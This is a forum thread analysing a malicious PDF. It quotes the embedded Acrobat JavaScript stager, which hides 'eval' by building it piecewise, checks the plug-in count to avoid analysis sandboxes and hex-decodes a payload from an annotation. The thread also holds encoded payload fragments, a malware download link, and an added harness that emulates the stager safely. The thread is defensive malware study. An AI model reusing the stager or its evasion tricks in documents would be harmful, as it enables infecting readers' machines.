Help analyzing a malicious PDF


Sunk
August 6th, 2011, 05:50
1. Neither Annot in object 5 nor 7 has a "-" in it, so how does "var arr = sum.split(/-/);" create an array?
2. What does "app[fnc]/**/(buf);" do?
3. What is the point of checking how many browser plugins there are?

JS from object 9
Code:

var pr = null;
var fnc = 'ev';              // function name is assembled piecewise: 'ev' + 'a' + 'l'
var sum = '';

app.doc.syncAnnotScan();     // Acrobat JS API: make sure all annotations are loaded

if (app.plugIns.length != 0) {            // app.plugIns: installed Acrobat plug-ins
    var num = 1;
    pr = app.doc.getAnnots({ nPage: 0 });  // all annotations on the first page
    sum = pr[num].subject;                 // Subject field of the second annotation carries the data
}

var buf = "";

if (app.plugIns.length > 3) {
    fnc += 'a';
    var arr = sum.split(/-/);              // expects "-"-separated hex byte pairs
    for (var i = 1; i < arr.length; i++) {
        buf += String.fromCharCode("0x" + arr[i]);   // "0x41" -> 65 -> "A" (forum rendered arr[i] as arr[I])
    }
    fnc += 'l';
}

if (app.plugIns.length >= 2) {
    app[fnc]/**/(buf);   // /**/ is an empty comment, so this is app['eval'](buf)
}



Part of the encoded data from object 5
Code:

a5q311k7p350g164m0t241n1e6g6d232q4r241004276i2j4q6f3i2q2l6j7j2h494u5g1l6t780946777e8048276m3q4336083 6726c68283b6l7f7q4o5l7e1h7g32715l312h7p6p3r8383431227191n435l2j2e5i1l230a2b5u123s7a3p3h045o371t6d3n3 q3b6s61193o7a6f5t4j3o58311r7h875l64460s2n4j876d134c3u1925763u1d33432n5f563r50864n647h845p5e7j0h2k677 m0t2h1s6o31085j2q0j065g2718553c472c5062181k6d7o723f441n1a206f6m4d304718144o6639055b2m7f3161381q3m5t4 a6h6k6756237d4u7s0n464r7l66264r5h0g1f68651n0l5d5k7e03742n2q087h371b25620i0f5i5r5k3c3f2j0i454j746l3u4 m0u5d3i6u2l6c3f7a81414r2s7d045g5t5n426e3i1s07610u1l4p6q2d6p3q6u3t1c305352155s5f4t5n7d5d6k2n7r052g3g0 96f2p1g6k0a132s3307022r306p5d30437t5q3b1g1869527s0o4c1b167h7a404n2h436p1u226e2s012k3h4o395k347c4h374 i656g3g617k7l4i7o6951257t5q22266c621n5r61791g2m5s72874d3i040g75336s303b0r045e356f0l3n270e1e5e4d6t3i4 i6g680r7729680p865a49473379152359395u3336786i440d643d2d006m362u7781556n6j010g525g7p0u361a0h1e0g3q0r2 j3h117i4o5c4g1r3p1m1m284u65851s3u6p7b0a822d802s6e5u3n1f2j6u072r512a5a1n0m5d6m2j62742u3k1b4t1a2j560j4 q64460q7241846q0p558575814q1o75793e1r5r4c430q7u50




Part of the encoded data from object 7
Code:

z00z6az00z33z00z68z00z31z00z31z00z37z00z69z00z34z00z6fz00z35z00z63z00z34z00z67z00z31z00z72z00z33z00z 70z00z31z00z6dz00z31z00z6dz00z32z00z38z00z34z00z75z00z36z00z35z00z38z00z35z00z31z00z73z00z33z00z75z0 0z36z00z70z00z37z00z62z00z30z00z61z00z38z00z32z00z32z00z64z00z38z00z30z00z32z00z73z00z36z00z65z00z35 z00z75z00z33z00z6ez00z31z00z66z00z32z00z6az00z36z00z75z00z30z00z37z00z32z00z72z00z35z00z31z00z32z00z 61z00z35z00z61z00z31z00z6ez00z30z00z6dz00z35z00z64z00z36z00z6dz00z32z00z6az00z36z00z32z00z37z00z34z0 0z32z00z75z00z33z00z6bz00z31z00z62z00z34z00z74z00z31z00z61z00z32z00z6az00z35z00z36z00z30z00z6az00z34 z00z71z00z36z00z34z00z34z00z36z00z30z00z71z00z37z00z32z00z34z00z31z00z38z00z34z00z36z00z71z00z30z00z 70z00z35z00z35z00z38z00z35z00z37z00z35z00z38z00z31z00z34z00z71z00z31z00z6fz00z37z00z35z00z37z00z39z0 0z33z00z65z00z31z00z72z00z35z00z72z00z34z00z63z00z34z00z33z00z30z00z71z00z37z00z75z00z35z00z30z00z22 z00z29z00z3bz00z0dz00z0az00z0dz00z0az00z0dz00z0a



MALWARE/BIOHAZARD
http://www.megaupload.com/?d=5F52NSCW

R33N
August 8th, 2011, 15:20
I am new to examining this stuff, but it looks like a good one to look at. Thanks for the download. It looks like you are to the point where you have to start doing a couple of things.

Q. What is the point of checking how many browser plugins there are?

A. If you notice, the browser checks are looking for an amount of plugins (which must return a number) greater than the number in each if statement.

In this case it could be that they are using this to identify if the script is running on a user machine that may have plugins or an emulation environment that might not have any sort of plugins. My thought is these can be removed, or you could say If ( 3 > 2) { code }.

Trying to see it from an attacker's perspective: if I want to try and identify the environment that my payload is running in, maybe I can check plugins to see if there are any there. If not, the script is not going to run, but in most cases there will be on a user's machine, so let's let it run.

Q. What does "app[fnc]/**/(buf);" do?

var fnc = 'ev';
fnc += 'a';
fnc += 'l';

var fnc = 'eval' --> this is probably broken up in order to evade signature detection by an automated scanner.
app.doc ----> app seems to be the object used throughout this code "that I am not sure of". Also maybe this means that we need values from the plugins, but I don't think so.

Where I am at on this currently -----> I actually ran into errors trying to get the code to execute with SpiderMonkey because of app.doc errors. After adding these objects in, my issue is now 'pr' not having a value.

Q. Neither Annot in object 5 nor 7 has a "-" in it, so how does "var arr = sum.split(/-/);" create an array?

I think the final result of this code is to convert Unicode into characters from the result of element1 = (0x + "object 5 (2 characters)"); element2 = for each "z" replace with element1.

Of course that is all just a theory, not really any proof until I get the shellcode to output. Once that is the case, I can frame it up and start debugging it and seeing what is next.
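Since R33N got stuck on app.doc and pr when running the object-9 script under SpiderMonkey, here is an added harness (not code from the thread) that stubs the Acrobat objects the script touches, reproduces its control flow, and captures the decoded text instead of passing it to eval. makeApp, runStage, decodeSample and the sample subject string are my own constructions; the subject is in the "-"-separated hex format the script's split/fromCharCode loop expects and decodes to a harmless app.alert(1).

```javascript
// Added harness (not from the thread): stub the Acrobat objects the object-9
// script uses so its decoder stage runs offline; the text it would hand to
// eval is recorded, never executed. All names and sample data are constructed.

function makeApp(pluginCount, subject) {
  const calls = [];                               // records app[fnc](buf) calls
  const app = {
    plugIns: new Array(pluginCount).fill({}),     // script only reads .length
    doc: {
      syncAnnotScan() {},                         // no-op in the stub
      getAnnots(opts) {                           // opts.nPage ignored here
        return [{ subject: "decoy" }, { subject }]; // pr[1] is the carrier annot
      },
    },
    eval(s) { calls.push({ fn: "eval", arg: s }); }, // sink: capture, never run
  };
  return { app, calls };
}

// Same control flow as the object-9 script, run against the stub.
function runStage(app) {
  let pr = null, fnc = "ev", sum = "";
  app.doc.syncAnnotScan();
  if (app.plugIns.length != 0) {
    pr = app.doc.getAnnots({ nPage: 0 });
    sum = pr[1].subject;
  }
  let buf = "";
  if (app.plugIns.length > 3) {
    fnc += "a";
    const arr = sum.split(/-/);                   // arr[0] is "" for a leading "-"
    for (let i = 1; i < arr.length; i++) {
      buf += String.fromCharCode("0x" + arr[i]);  // "0x61" -> 97 -> "a"
    }
    fnc += "l";
  }
  if (app.plugIns.length >= 2) {
    // With 2 or 3 plug-ins fnc is still "ev"; the real script throws a TypeError here.
    if (typeof app[fnc] !== "function") return { fnc, buf, error: "app." + fnc + " undefined" };
    app[fnc](buf);
  }
  return { fnc, buf, error: null };
}

// Constructed subject: "-"-separated hex bytes of the harmless text app.alert(1)
const SAMPLE_SUBJECT = "-61-70-70-2e-61-6c-65-72-74-28-31-29";
function decodeSample(pluginCount) {
  const { app, calls } = makeApp(pluginCount, SAMPLE_SUBJECT);
  return { ...runStage(app), calls };
}
```

Running decodeSample with 0, 3 and 4 plug-ins shows the three branches the plug-in count selects: no call at all, a call to the undefined app.ev, and the full decode-then-eval path.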